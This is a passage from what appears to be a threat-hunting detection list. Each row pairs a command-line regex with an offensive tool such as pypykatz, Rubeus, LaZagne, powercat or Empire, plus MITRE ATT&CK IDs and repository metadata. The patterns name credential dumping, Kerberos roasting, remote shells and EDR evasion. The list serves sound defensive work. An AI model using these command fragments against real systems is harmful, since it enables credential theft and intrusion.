*",".{0,1000}\skerberos\sasreproast\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos brute * -d *",".{0,1000}\skerberos\sbrute\s.{0,1000}\s\-d\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos brute *.txt*",".{0,1000}\skerberos\sbrute\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos ccache del *.ccache*",".{0,1000}\skerberos\sccache\sdel\s.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos ccache exportkirbi *",".{0,1000}\skerberos\sccache\sexportkirbi\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos ccache list *.ccache*",".{0,1000}\skerberos\sccache\slist\s.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure 
Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos ccache loadkirbi *",".{0,1000}\skerberos\sccache\sloadkirbi\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos ccache roast *",".{0,1000}\skerberos\sccache\sroast\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos keytab *.keytab*",".{0,1000}\skerberos\skeytab\s.{0,1000}\.keytab.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos kirbi parse *",".{0,1000}\skerberos\skirbi\sparse\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos spnroast *",".{0,1000}\skerberos\sspnroast\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential 
Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* kerberos tgt *kerberos+rc4://*:*@*",".{0,1000}\skerberos\stgt\s.{0,1000}kerberos\+rc4\:\/\/.{0,1000}\:.{0,1000}\@.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* kerberos.py*",".{0,1000}\skerberos\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* kerbrute.py*",".{0,1000}\skerbrute\.py.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "* --key examples/conspicuous.priv --isconspicuous*",".{0,1000}\s\-\-key\sexamples\/conspicuous\.priv\s\-\-isconspicuous.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment 
with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --key PPLBlade*",".{0,1000}\s\-\-key\sPPLBlade.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* keylogger *",".{0,1000}\skeylogger\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* --keyword * --check --ocr * --alexa*",".{0,1000}\s\-\-keyword\s.{0,1000}\s\-\-check\s\-\-ocr\s.{0,1000}\s\-\-alexa.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - 
TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1466","285","2023-11-23T05:38:05Z","2017-03-01T11:16:26Z" "* -KillDate *",".{0,1000}\s\-KillDate\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -KillDays *",".{0,1000}\s\-KillDays\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* killer.cpp *",".{0,1000}\skiller\.cpp\s.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "* killer.exe*",".{0,1000}\skiller\.exe.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "* kimi.py *",".{0,1000}\skimi\.py\s.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "* KittyStager*",".{0,1000}\sKittyStager.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "* klist * /service:*",".{0,1000}\sklist\s.{0,1000}\s\/service\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* knx-gateway-discover.nse*",".{0,1000}\sknx\-gateway\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* knx-gateway-info.nse*",".{0,1000}\sknx\-gateway\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* KRB hijacking module *",".{0,1000}\sKRB\shijacking\smodule\s.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "* krb5-enum-users.nse*",".{0,1000}\skrb5\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --krbpass * --krbsalt * -t * --escalate-user *",".{0,1000}\s\-\-krbpass\s.{0,1000}\s\-\-krbsalt\s.{0,1000}\s\-t\s.{0,1000}\s\-\-escalate\-user\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --krbpass *--krbsalt*",".{0,1000}\s\-\-krbpass\s.{0,1000}\-\-krbsalt.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "* KRBUACBypass*",".{0,1000}\sKRBUACBypass.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "* -l nmapRssuilt.xml -v*",".{0,1000}\s\-l\snmapRssuilt\.xml\s\-v.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - 
TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "* -l -p * -e cmd -ge*",".{0,1000}\s\-l\s\-p\s.{0,1000}\s\-e\scmd\s\-ge.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "* l$a$$Pid *",".{0,1000}\sl\$a\$\$Pid\s.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "* Ladon.ps1*",".{0,1000}\sLadon\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* Ladon.py*",".{0,1000}\sLadon\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* Lalin.sh*",".{0,1000}\sLalin\.sh.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . 
install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","0","N/A","N/A","4","354","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" "* laps.py *--ldapserver*",".{0,1000}\slaps\.py\s.{0,1000}\-\-ldapserver.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","238","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "* laps.py *-u * -p *",".{0,1000}\slaps\.py\s.{0,1000}\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","238","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "* LaZagne.py *",".{0,1000}\sLaZagne\.py\s.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "* laZagne.py*",".{0,1000}\slaZagne\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "* lazypariah*",".{0,1000}\slazypariah.{0,1000}","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","0","N/A","N/A","2","139","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" "* ldap * --gmsa *dump*",".{0,1000}\sldap\s.{0,1000}\s\-\-gmsa\s.{0,1000}dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* ldap * --trusted-for-delegation*",".{0,1000}\sldap\s.{0,1000}\s\-\-trusted\-for\-delegation.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* ldap * -u * -p * --admin-count*",".{0,1000}\sldap\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-admin\-count.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - 
T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* ldap * -u * -p * -M whoami *",".{0,1000}\sldap\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\swhoami\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* --ldap servicePrincipalName=* --domain * --user * --pass *",".{0,1000}\s\-\-ldap\sservicePrincipalName\=.{0,1000}\s\-\-domain\s.{0,1000}\s\-\-user\s.{0,1000}\s\-\-pass\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "* ldap-brute.nse*",".{0,1000}\sldap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ldap-novell-getpass.nse*",".{0,1000}\sldap\-novell\-getpass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ldapper.py*",".{0,1000}\sldapper\.py.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","7","1","87","9","2022-09-30T23:28:28Z","2020-06-17T16:53:35Z" "* ldapph.db*",".{0,1000}\sldapph\.db.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "* ldap-rootdse.nse*",".{0,1000}\sldap\-rootdse\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ldap-search.nse*",".{0,1000}\sldap\-search\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ldapsearch-ad.py*",".{0,1000}\sldapsearch\-ad\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* --ldapusername * --ldappassword *",".{0,1000}\s\-\-ldapusername\s\s.{0,1000}\s\-\-ldappassword\s.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 